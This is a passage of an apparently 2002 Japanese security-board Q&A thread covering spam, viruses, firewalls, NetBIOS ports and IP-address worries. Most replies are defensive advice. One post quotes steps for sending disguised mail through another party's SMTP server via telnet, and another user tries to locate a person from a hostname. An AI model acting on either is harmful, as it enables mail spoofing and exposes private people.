「No Connection」と表示されています。
再起動するたびに真っ先に出現し、手動での終了も出来ません。

これは一体何なのか教えていただきたいのです。
危険なものであるならば、その消去方法までご教授お願いします…
>>752
ここじゃ釣れませんよ
754名無しさん@お腹いっぱい。:02/12/19 20:21
変なメールが来た。
重要度”高”
送信者:European Top10 <[email protected]>
件名:Presentation in Japan (to: Program Director)
Now you can be the first getting The EuroTop10 for your station in your market!

The European Top10 is a 3 hours weekly countdown with the hottest hits all over
Europe. The show produced in affiliation with leading stations in more than 20
countries is now available in Japan and you can reserve it in exclusive using the form
above or faxing your information to + (1) 413.80.32.768.

An innovative production than can be customized for your station and coproduced in
Japanese. Every week together with the show you will get:
- Version for co-production
- Script and production guide
- Chart updated weekly
- Info about the artists featured every week

Also you can add your sponsor and station name, and insert commercials. Just tell us
what you need and we'll produce a special promo in your language so you'll see how
it will sound for your station.

Special price for local stations is $275/month (all included).
Stand out from your competition and reserve the EuroTop10 now!:

or complete the form and we'll send you more information.


Best regards,
>>754
あっそ
756つづき:02/12/19 20:24
ヨーロッパのサイトなんか行かないし
身に覚えが無いのにプロバのメアドに来た。
http://www.eutop10.com
サイト本体はここらしい。行ってはみたけどスクリプトONするんが怖くて
表紙意外なにも見れない。どんなサイトすか?
757名無しさん@お腹いっぱい。:02/12/19 20:25
>>751
どうも。
urlが思い切り晒されていたので
思わず踏んでしまいました。
そのBBSには二度と関わらないようにします。
>>756
お前ココの住人に人柱になれというのか?ん?

view-source:http://www.eutop10.com/
759754:02/12/19 20:33
>人柱
やっぱ危険なサイトなの?
オレの設定じゃ
E U T O P 1 0

C H E C K I N G F L A S H P L U G - I N

しか見れない。
760754:02/12/19 20:47
ロボット検索じゃサッパリだったんで誰か訳せる人いない?
なあ、

       セキュリティとどういう関係があるんだ?
SPAMぐらいで騒ぐな
http://www.excite.co.jp/world/text/
で機械翻訳しましたが
ただの宣伝メールにしか見えませんね。
大変です。ハッキングされますた
http://news3.2ch.net/test/read.cgi/news7/1040304657/

こういうことって本当に出来るの?
765cheshire-cat ◆PhCATJR.v6 :02/12/19 22:42
>>743
NetBEUIはルーティングできないプロトコルというか、ルーターを超えられませぬ。
だものでこれのみでLAN内部でファイルをやりとりする分には安全、という話ですねん。

NBT(NetBIOS over TCP/IP)はルーターを超えられまするんで、これを有効にするのはダメと。
んでもTCP/IPの設定のWINSタブで、「NetBIOS over TCP/IPを無効にしる」にしても、結局いたずらされる機会はあります。

安易な解決法として。
まずはルーターで、WANというかインターネット側から、LAN内部方向へ向けてのPort137、138、139、445のトラフィックを全てブロックしてくだされ。
ついでに135も。

そすれば(どれかをダイヤルアップとかAir'Hで繋ぐ機会が全く無いなら)、共有ファイルを抜かれる可能性は(ルーターの設定ミスがなければ)、まず無いって思いまする。

参考までにどんぞ。
http://pc.2ch.net/test/read.cgi/sec/1033726535/
766名無しさん@お腹いっぱい。:02/12/20 00:30
IEのホームをyahooに設定しているのですが、
それがシャットダウンして立ち上げを何回かやってる内に
エロ画像に書きかえられてしまいます。エロサイトで
間違って変な広告をクリックして以来この調子です。
どこに原因がある可能性が高いでしょうか?
>>766
エロサイト見たら・・・助けてください!Part8
http://pc.2ch.net/test/read.cgi/pcqa/1038097140/
768にゃ:02/12/20 00:37
>>766
エロ広告クリックしたからだよ。いい加減にすれたいくらいよんどけ
769すみません:02/12/20 00:38
> IP抜いたぞ
>  ttp://www.dyndns.org/cgi-bin/check_ip.cgi

このような書き込みを、
いろんな掲示板で良く見るのですが、これ何のアドレスでしょうか???
教えてください(マジでよろしく願いします)

おそらく、自分のIPを調べるものと思うのですが、
クリックすると抜かれるのでしょうか??

いちおうググッたのですが、
IPアドレスの更新を自動的に行ってくれるソフトウェアに使用すると言うことしか
分かりませんでした・・・

(他のスレに書き込んだものですが、回答してもらえなかったので、
こちらにコピペしました。ご了承ください)
770cheshire-cat ◆PhCATJR.v6 :02/12/20 00:38
>>766
IEのプロパティ→セキュリティタブの設定が悪いとか。
Windows Updateを長らくやってないんで、JavaVMのバージョンが古いとか。
変なウイルス踏んだとか。

どんぞ。
http://www.dual.co.jp/cgi-bin/D-ch/mibbs.cgi?mode=point&fol=pc&tn=0053
>>769
今アンチウィルス入れてないからリンク先踏んでないけど、
「IP抜いたぞ」 ってやつは、「僕は馬鹿です!」って言ってると思え
IPアドレスが知られたところで使ってるプロバイダくらいしかわからん
よって、全く気にする必要なし
ぼんちゃんのカキコのページが、荒らしに荒らされてます!
危ない仲間たちのパワーを貸してください!
消去しても消去しても、名前を変え、PCを変え、
最後には携帯で書き込みをしてる・・・。
なんと情けない・・・(爆)
http://mbspro5.uic.to/user/bonjing3.html

詳しい内容の事は、ページを作っています。
アドレスを送りますので、ぼんちゃんにメールください・・・。
危ない仲間達で、れっつらごぉ〜〜!
危ない仲間専用BBSはこちらです

http://mbspro7.uic.to/user/46974697.html

トップページ見たいならここからでもいいよ
http://ww4.enjoy.ne.jp/~bonjing3/newpagebonjing3.html
773cheshire-cat ◆PhCATJR.v6 :02/12/20 01:00
>>772
荒らし依頼、了解すますた。。。。。(嘘
774769 すみません:02/12/20 01:11
>>771
ご回答ありがとうございます。IP抜かれても特に問題ないのですね。

このアドレス踏んでみたのですが、確かに僕のIP表示されます。
やっぱり抜かれているのでしょうか?
>>774
どっかにアクセスすると相手にIPアドレスが渡るんだよ、そうじゃないと
基本的には通信できないし・・・
別に自分のIPアドレス表示されても問題なし、むしろ表示されないほうが怖い
776名無しさん@お腹いっぱい。:02/12/20 02:10
ちょっと不安なのでどなたか御教授ください。
ノートンのInternetSecurity2002を入れているのですが、
週に1度くらいのペース(正確ではありませんが)で
下記のような警告が出ます。

次の通信を検出しました
アプリケーション: C:\WINNT\system32\services.exe
プロトコル: UDP(インバウンド)
リモートアドレス: localhost(127.0.0.1) : epmap(135)
ローカルアドレス: 0.0.0.0 : 1028

IEとメーラーとかちゅーしゃしか立ち上げていない状態で
無操作時に突然この警告が出てきます。
一応最新のデータでウィルスチェックはしているので
感染しているとかいうことは多分ないと思うのですが、
このファイルが何をしているのか得体が知れないので、
一応毎回通信を遮断しています。

このファイルがどういうファイルで何をしているのか
おわかりの方がいましたら、教えてください。
777名無しさん@お腹いっぱい。:02/12/20 02:36
VBS_REDROF.AまたはVBS_REDLOF.GENのウイルスについてや
駆除法が書いてあるスレってありませんでしょうか。
板違いでしたらすみません。
>>776
http://pc.2ch.net/test/read.cgi/sec/1035271935/

>>777
特別スレは立ってません。アンチウイルスメーカーのサイトを参照。
779776:02/12/20 02:53
>>767>>766>>770
どうもありがとうございました
今度から気をつけます(;´Д`)
780776:02/12/20 02:57
↑766?

>>778
ありがとうございました。
すごく参考になりました。
781名無しさん@お腹いっぱい。:02/12/20 03:28
コンピュータウイルスは誰が作ってるの?
なんのため?
783名無しさん@お腹いっぱい。:02/12/20 03:41
質問です…。
アナログとCX4?とかでアドレスから住所って調べられるの?
784( ・_・)y─~~~:02/12/20 03:46
メールアドレスそのままクリックすると電話に繋がる事があります。
785名無しさん@お腹いっぱい。:02/12/20 03:48
YAHOOアドレスから住所など調べる事は可能なんですか?
>>785
もちろん
787名無しさん@お腹いっぱい。:02/12/20 03:56
外国(マレーシア)の人と日本語で文通してたら
ある日その人のメアドから
Subject: Fwd: Funny comics!!!! be careful la~ hehehehehehehe~~~
といういかにも怪しいメールが届きました。
受け取り確認で「はい」と押したあと
メールを開いてみたら??????????ばかりで読めませんでした。
添付ファイルもあるみたいなのですが怖くて開けません。
題名を右クリック>>プロパティ>>詳細>>ソースで
ソースを読んでみたら、本文??????????の下に
フリーのメアドが沢山ありました。hotmailが多かったです。
いろんなところを経てきたメールのようにも見えますし
いろんなところに自動でメールを送ってしまった気もします。
いったい何のメールなのでしょうか。
もしかして私は何か間違いをしてしまったでしょうか?
どのような対応をすれば良かったでしょうか?
親切な方、教えて下さい。
因みにw98で付属のoutlook expressを使っています。
ウイルスバスター2001も使っていますが何も反応はでませんでした。
788名無しさん@お腹いっぱい。:02/12/20 03:59
そんな事が可能なんですか?
他人のYAHOOアドレスから住所を調べることが…。
では、アナログとCX4があればアドレスさえ手に入れば簡単に他人の住所や名前が分かってしまうと言う事ですか?
789 :02/12/20 04:25
xupiterという検索?スパイウェアに寄生されてしまい
ファイルの削除はしたのですが
ツールバーにその跡が残ってしまいました。
右クリックのメニューで標準のボタン・アドレスバー・リンクと共にxupiterが表示されてしまいます。
どなたか削除する対処法を教えてください
2ちゃんねる VS TIME・・・
その戦いの歴史は、まさに近代兵器の見本市だった
田代砲にはじまる数々のスクリプト兵器を経て、到達した97式アラファトマシンガン
これはまさに最終兵器として、猛威を振るった
だがしかし、ついにTIMEはこれらの兵器全てを完膚無きまでに無効とする
パプリカの設置に成功した
武器を奪われた我々に残されたもの ・・・それはチョップ
手動で一撃一撃叩き込むチョップ。地味で威力も極限まで小さなチョップ
ただそれだけと、なってしまった
だがしかし、チョップといえども決してバカには出来ないということを!
そしてこのような手段にまで出たTIMEを今一度
我が2ちゃんねらーの総意を込めたチョップを以て、叩き壊したい!
有志たちの参戦を、ひとりでも多くの戦士の挑戦を待つ!!!
http://live.2ch.net/test/read.cgi/festival/1040297042/
>>752
コピペ
792戦おう!:02/12/20 06:26
ぼんちゃんのカキコのページが、荒らしに荒らされてます!
危ない仲間たちのパワーを貸してください!
消去しても消去しても、名前を変え、PCを変え、
最後には携帯で書き込みをしてる・・・。
なんと情けない・・・(爆)
http://mbspro5.uic.to/user/bonjing3.html
詳しい内容の事は、ページを作っています。
アドレスを送りますので、ぼんちゃんにメールください・・・。
危ない仲間達で、れっつらごぉ〜〜!

危ない仲間専用BBSはこちら(応援してね)
http://mbspro7.uic.to/user/46974697.html
トップページから見たいならここからでもいいよ
http://ww4.enjoy.ne.jp/~bonjing3/newpagebonjing3.html
793cheshire-cat ◆PhCATJR.v6 :02/12/20 07:01
>>792
>危ない仲間達で、れっつらごぉ〜〜!

君一人でか?
794ドキンちゃん:02/12/20 12:49
>>781
ウイルス作者はなぜ捕まらないのか?
http://www.hotwired.co.jp/news/news/technology/story/20020121301.html
>>787
ウィルス検知が反応しなかったのならそのまますべてを削除。
796743:02/12/20 13:48
>765
ありがとうございます。
やっぱNBTは無効にして、内部はTCP/IPの代わりに
NetBEUIでつないでいる人が多いんでしょうか?

プロトコルを混在させたくないんですが、
NBT有効(自分の場合は[規定値]ですが)はやばそうなんで、
ルーターで対処しときます。
ちなみに、「Shileds Up!」 をやったら139は 「Stealth」でした。
797787:02/12/20 17:49
>>795
ありがとうございます。
最新のウイルス検知に引っかからなくても危ない
と言うことはありますでしょうか。
スクリプト?はウイルス検知に反応しない
とか聞いたことがあるのですが意味が分かりませんでした。
もし危険でないのならなんのメールか調べてみたいのですが。
なぜ串を使って2チャンネルに書き込めるんでしょうか?
今串を使ってます・・・
それが変なんです、今まで色んな串を使って試してたけど2チャンネルに書き込めた事なんてなかった。
もしかして串によってはプロ串と判断されない事もあると言う事ですか?
とにかくこんな事初めてです。
>>798
いままで使ってたのはアマ串だったんじゃないかな?
あとで高い請求書が来るかもね。プロなんだもん。
800名無しさん@お腹いっぱい。:02/12/20 19:00
>>797 あまり余計なことはしないほうがいい。
Outlook ExpressはWindowsUpdateで最新状態になっているか?
古いOEにはプレビューだけでウィルス感染など危険がいっぱい。

OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
>>799
そんなのあるんすか?
アマ串とかプロ串って?登録された即出と言う奴?は2チャンネルに
書き込めなくしてて、最新の出たばかりの知られてないプロ串は書き込めると言う事かな。
まあ明日には書き込めないんでしょうが。
803cheshire-cat ◆PhCATJR.v6 :02/12/20 19:17
>>743=796
多分、NetBEUI使わないで、LAN内部はTCP/IPだけで、NBTは無効な人が多いんではないでしょか。
んで、恐らくPersonal Fire Wallを利用していないケースも多いかと。
何故かって言うと、ルーターでそゆのはWAN→LAN方向のはブロックできるし、企業ではNetBEUIだけだとActive Directoryに対処できないからです。
ルーター無くても、MSネットワーク共有クライアント等を利用しないときは利用できないようにする、これ基本。

>「Shileds Up!」 をやったら
それって、君のパソじゃなくて、ルーターをポートスキャンしてるんではないでしょか。ひょっとして。

なおPersonal Fire Wallを利用する意義みたいなのは。
ダイヤルアップユーザーとか、ルーター使ってないとか、「LAN内部だろがみんな敵じゃぁ!」みたいな人とか。
またウイルスや罠ファイルやお行儀の悪いアプリによる不慮の接続に慎重に対処したいからだと思いまする。
もちろんツール等に頼らずパソの設定を完璧にするってのも、アリです。

いずれにしても、「どの程度でオチをつけるというか納得する」、ってのは、君が「何をどの程度まで固めてそして利便性を失うのか」次第です。
それは各々の考えとかポリシーによって皆それぞれ異なるはずですから、最終的に決めるのは、君次第です。
長文ご容赦。
804cheshire-cat ◆PhCATJR.v6 :02/12/20 19:19
長すぎると読みづらいってのを、我ながら何となく実感。
805名無しさん@お腹いっぱい。:02/12/20 20:17
http://www.vector.co.jp/soft/dl/winnt/util/se257052.html
Vectorでこんなの見つけたんですが効果あるでしょうか?
評判(・∀・)イイ?
よーわからんがチェックだけ(適切に設定されるわけではない)らしいから
毒にも薬にもならないふつーのソフトなんじゃないかしら。
807cheshire-cat ◆PhCATJR.v6 :02/12/20 20:29
>>805
IPC$でちゃう内容のレポートが出ますた。
塞いでいるんですが、2で。

管理共有が無効なのに、有効って表示がでますた。
テストしたのはサブパソのXP homeだし。

それ除くと、漏れのパソの設定をちゃんと全て正確に検出しますた。
808cheshire-cat ◆PhCATJR.v6 :02/12/20 20:30
つか、XP対応じゃなかったのねん。スマソ。
>>807
レスありがとうございます。
残念ながら漏れの環境では実行出来ませんですた。(´・ω・`)
XPSP1PRO
810 新ワーム?:02/12/20 20:51
iraq_oil.exe
Norton AntiVirus 最新定義ファイルにより削除完了
811cheshire-cat ◆PhCATJR.v6 :02/12/20 20:54
>>809
MS ベースラインセキュリティアナライザーでも、IPC$は同様のミス解析が出たりしますねん。

>>810
どんぞ。つかまだ来ない。。。。。誰かくだされ。
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.lioten.html
812cheshire-cat ◆PhCATJR.v6 :02/12/20 20:57
補足ですが。
スタンドアロンなんでサービスからServerを無効にしてるけど、何故か有効になってると警告がでた。
813あぼーん:あぼーん
あぼーん
814cheshire-cat ◆PhCATJR.v6 :02/12/20 21:09
>>813
すげーマジレスですが。
板違いだと思いまする。
815754:02/12/20 21:10
>>761
じゃあ例えば
スクリプトONにしとくと、勝手にメアド読まれるなんてことはない?
816名無しさん@お腹いっぱい。:02/12/20 21:17
自分は見てないのに、勝手にサイトを見て回るウイルスとかありませんか?
ブラウザの履歴に見覚えのないものがたくさんあったのですが(しかもアダルト関係)。
>>816
エロ親父かエロ息子かエロ兄弟を小一時間問い詰めろ。
818名無しさん@お腹いっぱい。:02/12/20 21:40
すみません質問させてください
昨日PCを起動したら、しばらくしていきなりメディアプレーヤーが
起動したんです。
なんか変だな、と思ってウィルススキャンしてみたら
「KillAV.C」に感染してる、と表示されました。
5個のファイルが感染していたんですが、そのうち4個は
\_RESTORE\ARCHIVE\FSxx.CAB
という所にあって、ウィルスソフトで削除も修復もできませんでした。
ググッてみてもヒットしたのはシマンテックの英語サイトのみで
ノートンを使っていない自分にはよく解かりません。
だれか解かる方いませんか?
当方の環境は
WinMe/IE6.0SP1/OE6/パッチは適用済です
使用ウィルスソフトはBDFEです。
820名無しさん@お腹いっぱい。:02/12/20 21:45
>816
エロ親父かエロ(略

ウイルスでなくとも、HTMLのレベルで簡単に出来そうだな。
ダミーページ作って、それを読み込ませている間にエロサイトを読み込ませておくとか。
他の言語を使えば、さらにそのサイトのリンクを伝って飛ぶことも可能だから
一見すると自分がそのサイトを見たことあるようにすることもできる。
以前にそういう悪戯ページを見たことある気もするぞ。
821818:02/12/20 22:03
>>819
すばやいレスありがとうございます
早速逝ってきます
Windowsが起動しなくなりました、
PCを起動して、しばらくして黒い画面に
「〜〜と言うファイルがないか壊れている可能性があります
新しくインストールしてください」
みたいなメッセージがでてキーボードのEnterをおすと
また起動しようとしてそのメッセージがまた出ます。
ウイルスですかね?対処法を教えていただきたいです。
>>822
なぜ肝心な所を省略する?
>>822
>ウイルスですかね?
情報不足

>対処法を教えていただきたいです。
OSの再インストールor修復
825名無しさん@お腹いっぱい。:02/12/20 22:42
UNABOMBERってどこで
ダウンロードできますか?
>>825
ここじゃ釣れませんよ
827822:02/12/20 22:56
メッセージ確認してきました

次のファイルが存在しないか壊れているため、Windouwsを
起動できませんでした:
<Windows root>\system32\hal.dll.
上記のファイルをインストールし直してください

と出ます
対処法おねがいします
>>827
>>824参照
>>827
WinFAQに答えがある
830名無しさん@お腹いっぱい。:02/12/20 23:10
これはどうなんでしょうか?

トレンドマイクロのスキャンでは何も無し。
シマンテックのスキャンではトロイを1つ検出。

どなたかよろしくです。
831822:02/12/20 23:20
WinFAQ見ましたが全然わかりません
OSの再インストールしかないんでしょうか?
boot.ini の記述が実際の情報と食い違っている場合に発生するらしいです
食い違いを直す方法よかったら説明してもらえませんか?
冬休みだなぁ・・・

ね?
>>831
そこまでわかったのなら、Windows板で該当するOSのスレ探すか、
PC初心者板で聞いてみてね ちなみにここはセキュリティ板
834822:02/12/20 23:26
>>833
わかりました
スレ汚しすみませんでした
835 :02/12/21 01:16
836名無しさん@お腹いっぱい。:02/12/21 01:47
http://www.fdtext.com/txt/
印刷する方法ありませんか?
>>836
> 各科目の全内容は上記のPDFファイルで確認いただけますが,
> サンプルとしての性質上印刷,編集等はできない設定にしております。
商品なんだから買えば。なんで盗もうとするの?
838名無しさん@お腹いっぱい。:02/12/21 01:57
一番フリーズ起こりにくいFWってなんだろうか?
>>838
ルータについてるPFW(パケットフィルタリング?)とかどうかな?
>>838
箱なら何でもいい
(´-`).。oO(回答者も質問者も質が下がるのがこの時期なわけだが……)
>>838
半年ぐらい kerioを使っているけど、これが原因でハングって経験したこと無い。
けど、頻繁にハングアップを起こす FWなんてあるの?
フィルタリングの設定を間違っていて、通信できずにハングしているように見えるだけじゃ??
夏はもっと禿しいべさ
>>842
例えば、kerioならver.2.1.3以降でXPでのスタンバイからの復帰とか。
845;;:02/12/21 14:29
         教えて下さいっ!!(>△<;)
1.メールを出すターゲットを決める。
2.使用するSMTPサーバーを探す。他人もので出すなら、そのSMTPサーバーで
3.25番ポートにtelnetしてSMTPコードで先ず自分宛にメールを出す。自分の
IPアドレスやプロバイダーのアドレスがメールヘッダにあったら、ほかのプ
ロバイダーからアクセスする。
4.25番ポートにtelnetしてメールを出す。

のtelentの意味も何もかも意味が分かりません!(>□<;)
どうか教えて下さい。

>>845
http://www.google.com/search?num=50&lr=lang_ja&q=telnet

お前にゃ一生使いこなせない、に8000ペリカ
てゆうか、せきゅりてぃに関係なかったな、ちっとも。
テルネットってあれだよ、ほら、テレビの通販
テルネットたかた、ってやってるじゃん
850名無しさん@お腹いっぱい。:02/12/21 16:39
メーラーはEdMaxを使用しているのですが、
最近やたらとウイルスが届いて困っています。
「HTMLメールを表示する」にチェックは入れていませんが、
削除するために選択すると、本文部分に表示されています。
削除してますが、感染は防げているのでしょうか?
>>850
四六時中君のPCの使い方を監視したり
君のPCの状態を見ることはできないから
防げてるかなんて聞かれてもわからない。

心配なら自分でスキャンしような?
>>850
EdMaxは最も安全なメーラーの一つだと言われてますのでHTMLメール表示
でなければ添付ファイルを実行しない限り安全でしょう。
心配なら、強力なウィルス検出力のある無料版アンチドートでチェックされたら
どうですか?
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
まず、一番上のボタンを押して「コード解析」「圧縮ファイル」「メール確認」
にチェック入れてスキャンしてください。それから最初の画面に戻って上から
3番目のボタンでレジストリチェックしてください。
でた。真打登場!!
冬厨との大決戦を心待ちにしています。>>藪
>>850
>削除してますが、感染は防げているのでしょうか?
答えは「Yes」。表示されているのはただのTextだから感染はしていない。
以下はEdMaxの作者氏の解説
http://www.edcom.jp/edmax/avirus.html

EdMaxもIEコンポーネントを使用している以上、HTMLメールを見る場合の危険性は
充分にある。もしHTMLメールを読む場合は「最も安全」などという意味不明の妄言で
油断することなく、WindowsUpdate等でセキュリティーホールを埋めておく事が肝要。
855cheshire-cat ◆PhCATJR.v6 :02/12/21 20:57
Telnetで読むのが最強ってのは、漏れだけなんだろうか(死ぬほど不便だが)。
>>855
全然不便じゃない。
配信されたままの形式で保管しないEdMaxなどという腐れメーラよりはるかに優れている。
857cheshire-cat ◆PhCATJR.v6 :02/12/21 21:19
>>856
読むにはtelnet最強なんすけどね、まぁ。

受信はEdMax使うよか、Becky!使いまするけど。
OEにテキスト化機能が搭載されたんで、完全に移行したいけど、ふんぎりが付きませぬ。
858にゃ ◆b8NYAO8alI :02/12/21 22:22
>>857
見るだけとか、テストするだけなら、telnet 以外には使わないよ。
メールが多くなってきて、整理をしたいからとかいう理由だしね。

問題は、APOP だとか SSL だとかいうときはどうしようもないことだ(w
859名無しさん@お腹いっぱい。:02/12/22 02:29
e-accessのADSL、XPで、ルータはMegaBit Gear TE4121なのですが、
このルータのファイアウォール機能をオフにしたいのですが
設定画面でどのようにしたらよいのでしょうか?
よろしくお願いいたします。
>>859
「ルータのファイアウォール機能をオフ」にして何したいんだ?あぁ?
話は、そのあとだ。
861859:02/12/22 02:59
オンラインゲームです。
ポートの設定をいくらしてもアップデートに失敗するので、
アップデートの時だけオフにすればできるかなと思いまして。

教えていただけますか?
>>861
アップデトなら、それ相応のものをダウソすりゃええべ。
863859:02/12/22 03:11
いや、ゲームのアイコンをダブルクリックして始めようとしたときに
新しいアップデートがあると自動的にDLしてアップデートしてくれるのですが、
ファイアウォール機能が働いてると固まってしまうのです…

前まで使ってたパソコンではモジュラーの穴があったので、アップデートが
あった時だけダイヤルアップでアップデートしてたのですが、
新しいパソコンにはモジュラーの穴がなくて…

とにかく、このルータのファイアウォールをオフにする設定があるのなら
教えていただけませんか??お願いいたします。
「モジュラーの穴」がなけりゃ、付けりゃいいだろ?
いいかげんageすんな!
865859:02/12/22 03:22
あぁ、つまり、オフにはできないと。
age続けてしまってすみませんでした。
>856
>配信されたままの形式で保管しないEdMaxなどという腐れメーラよりはるかに優れている。→禿同!
867なぜなぜ?:02/12/22 13:28
ノートンアンチウイルス2002の体験版を
インストールし期限がきたのでアンインストールしました。
アンインストールしたにもかかわらずメールの受信の際に
zipファイルなどが安全でない為と削除されます。
完全にアンインストールされていないのでしょうか?
どなたかご教授ください。
>>859
どうやって、ファイアーウォールの影響で固まると判断できたんだ?
>>867
>>1
>同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
>どの板でも回答をもらえなくなってしまうので、書き込んでせめて1日程度はお待ちください。
870なぜなぜ?:02/12/22 13:53
すみませんでした。
871859:02/12/22 14:03
そのゲームのFAQに、
「アップデートのときに固まってしまいます」
→ADSLモデムでのファイアウォール機能が有効になっている可能性があります。
無効にするか、通常のFTP通信で使用するTCP20番、21番ポートを開けて下さい。

と書いてあるからです。
872クランキー:02/12/22 14:19
ノートンのNorton Internet Security 2003について教えていただきたいです。
これを入れるといろいろ不具合が起こる方もいらっしゃられるようなので、
導入するかどうか悩んでいます。
導入前にさかのぼって、hotmailなどに不正アクセスがあったかどうかをしらべることはできるのでしょうか?
(hotmailのサーバーに残っている情報を手に入れることができるのかどうかということです)
宜しくお願いします。

>>871
なんか、そのゲームの製作会社ってネットワークの事良く知らないんじゃないの?
それが原因じゃない気がする。

よほどヘボなルータじゃ無ければftpに対応してるはずだけど、確認するにはコマンドプロンプトから
ftp -d ftp.iij.ad.jp
でuser: ftp pass: anonymouse@でログインしてlsを実行してミレ
---> PORT xx.xx.xx.xx,4,91
200 PORT command successful.
が送られて
ディレクトリリストが表示されれば、ルータはftpに対応してるという事だから、ルータのせいじゃない。
>>866
マルチポストも有効である。そのBBSを信用していないことを
 明確に示せる。「どうせ、お前らじゃ分からんだろう。」という
 意志表示として高く評価できる。もちろんマルチポストの非礼を
 あらかじめ詫びてはならない。それでは、単なる「急いでいる人」
 になってしまう。それは、教えてクンではない。
  質問のタイトルは、「教えてください。」で良い。
 タイトルを読んだだけでは「何に関する質問」か全く分からない。
 そういう努力は、答える人間にさせれば良いのだ。
 とにかく、答える人間が答えやすいように気を使って質問しては
 ならない。傲慢で不遜な態度が必須である。
 「聞きたいことがあります。」など、プロの仕事であろう。
875名無しさん@お腹いっぱい。:02/12/22 15:16
2チャンネル覗いてたら、広告らしきメッセージが飛んできた。
これって、よくあるの? IPばればれ (-_-;)
------------------------------------------------------------------
アプリケーション ポップアップ: メッセンジャ サービス : タモチ から ???.???.???.??? へのメッセージ (2002/12/22 14:43:43)

チヲク・: XXXX サ鄲フニョ ニ�オソセネ コクソゥチンエマエル.

シコタホククネュ+クォ+セ゚オソ タ・ョ

http://xxxx.uu.st
http://xxxx.uu.st
http://xxxx.uu.st
http://xxxx.uu.st

ソ「スコソ「スコソ「スコソ「スコ スホタフニョ

シコタホタフ セニエマステク・チヲケ゚チサ エンセニチヨステー・ア篌ミサマシフエルク・
チヒシロヌマアクソ・.. ク。コクシシソ・..

シナーナコホ :
ステタロ-シウチ、-チヲセ簓-ー・ョオオアク-シュココ-messenger ソ。シュ シソタクキホシウチ、
>>875
よくあるわけじゃないが既知の問題
IPがわかったところで何かできるというわけではありませんが、何か?
877名無しさん@お腹いっぱい。:02/12/22 15:35
>876
初めての経験なんでびびっただけです。
878名無しさん@お腹いっぱい。:02/12/22 17:13
Win2000SP3+ノートンアンチウイルスでファイアーウォールのOutpostを使ってるのですが
OSを終了するとき1分以上時間がかかります。
手動でOutpostを終了させてからOSを終了させる時は10秒くらいで終了できるのですが。
これはどうにかならないのでしょうか?

879名無しさん@お腹いっぱい。:02/12/22 19:56
以下の構成で串させません。

ADSL(Y!BB)−ADSLモデムールーターーPC

OS:XP
ブラウザ:Opera6.05(build1140)

DNS・Gatewayにルーター(192.168.1.1)を設定しています。
この環境で串を使うにはブラウザの設定で串を指定するだけで
良いのでしょうか?

今のところ「プロキシの自動設定に失敗しました」とメッセージが出てきてしまいます。
880名無しさん@お腹いっぱい。:02/12/22 19:57
(・3・) エェー なんでセキュ板で聞くんだYO! 初級ネットワーク板で聞けYO!
882v:02/12/22 20:04
883879:02/12/22 21:15
>>881
すみません。
初ネット板逝ってきます。
>>878
うちもOutPostだけど、ログが溜まりすぎると終了が遅くなるようだ。
885名無しさん@お腹いっぱい。:02/12/23 01:12
pddccdc.tkyoac00.ap.so-net.ne.jp

この情報からこの人がどの都道府県にすんでいる人かわかりますか?
886cheshire-cat ◆PhCATJR.v6 :02/12/23 01:21
>>885
ネタですか?
887名無しさん@お腹いっぱい。:02/12/23 01:23
tkyo
888885:02/12/23 01:24
>>886
一応マジメです。
ネタ決定
メシでも食って落ち着け
890cheshire-cat ◆PhCATJR.v6 :02/12/23 01:29
何だかなぁ。

東京都内のリモホのヤシが、必ずしも東京都内から接続してるとは限らないし。
ping打ったら返ってきたぞ
892885:02/12/23 01:39
>>890
pddccdc.tkyoac00.ap.so-net.ne.jp
このひとと思われる人物ががとある非営利団体の会計をやっている人なんです。
この人が最近使い込みをしているのではないかという疑惑が浮上してきて、事情を聞こうと
連絡をとったら入院している母の看病をやっていて病院から一歩も出られない状態だ。
といっているので、看病が終わるのを待っている状態でした。
ところが最近この人物があるウェブページのチャットに匿名で入ってきてROMを続けているので
この人がその会計をやっていた人ではないかと思い確認をとりたいのです。
>>891
動的アドレスでPing打っても、ねぇ。

>>892
設定作りこみスギ。大方ICQでムカツクこと言われたんだろう。
相手が固定IPでない場合、キミは別人に攻撃することになる。
894cheshire-cat ◆PhCATJR.v6 :02/12/23 02:23
高木写真制作所かぁ。

>>893
確かになんでリアルで解決するべき問題を、こゆ所に持ち込むんでしょね。
895885:02/12/23 02:27
>>892
いやいやマジなんだこれが。
刑事事件で訴えることがほぼ決まっているんだけど、
少しでも情報を集めておきたいんですよ。
そのうちどこかの地方新聞に載るかもしれない・・・
数百万くらい残っているはずが300円しか残高かったときには笑ったね
896名無しさん@お腹いっぱい。:02/12/23 02:34
>>895
”あるウェブページのチャット”でROMってるだけで
なんでその人だと分かったの?
897cheshire-cat ◆PhCATJR.v6 :02/12/23 02:39
私怨タンにレスしてまった。。。。。。。。。
898885:02/12/23 02:41
そのページが一般公開されていなくて一日に十数人しか見にこないページなんですよ。
そこのチャットが毎週決まった日の決まった時間に行われているんですが、
その日時はページには乗せていなくてメンバーだけが知っているのに
他の日には入ってこないでのそ時間に決まってROMしにくるから
その人だろうと言うことになったんだけども確証が得られないからどうしたものかと思って
匿名でROMってる人のホストは必ず
*******.tkyoac00.ap.so-net.ne.jp
だから同一人物だろうとは思うんですがね。
899885:02/12/23 02:42
激しくスレ違いなのでこの辺で消えます。
プロバイダに報告しろ私怨馬鹿。
完全な匿名ってインターネットでは可能なんでしょうか?
もし、ないならどんな方法が1番匿名何でしょうか?
>>901
2ちゃんに書きこまないことだ。
>>901
ここでいう匿名というのは、足がつかないという意味でとってください。
名前を伏せるだけじゃなくて、IPなども・・・・
串をさすという意味でもないです。。。
904名無しさん@お腹いっぱい:02/12/23 07:53
ファイアーオールで
ICMP Destination Unreachable
をブロックしたってでるんですけど何ですか?
これはハッカーなんですか?

厨な質問ですまそ
>>903
通信すればなんらかの足跡は残るでしょ

>>904
わからない用語は検索。和訳だけでもなんとなく意味はつかめそうなもんだけど
906にゃ ◆b8NYAO8alI :02/12/23 09:54
>>903
途中の踏み台の足跡が消えれば、まぁ匿名になるかもしれん。
>>901
まずプロバイダにつないでる時点でアウトだろ。
>>901
前にも書いたんだけど、
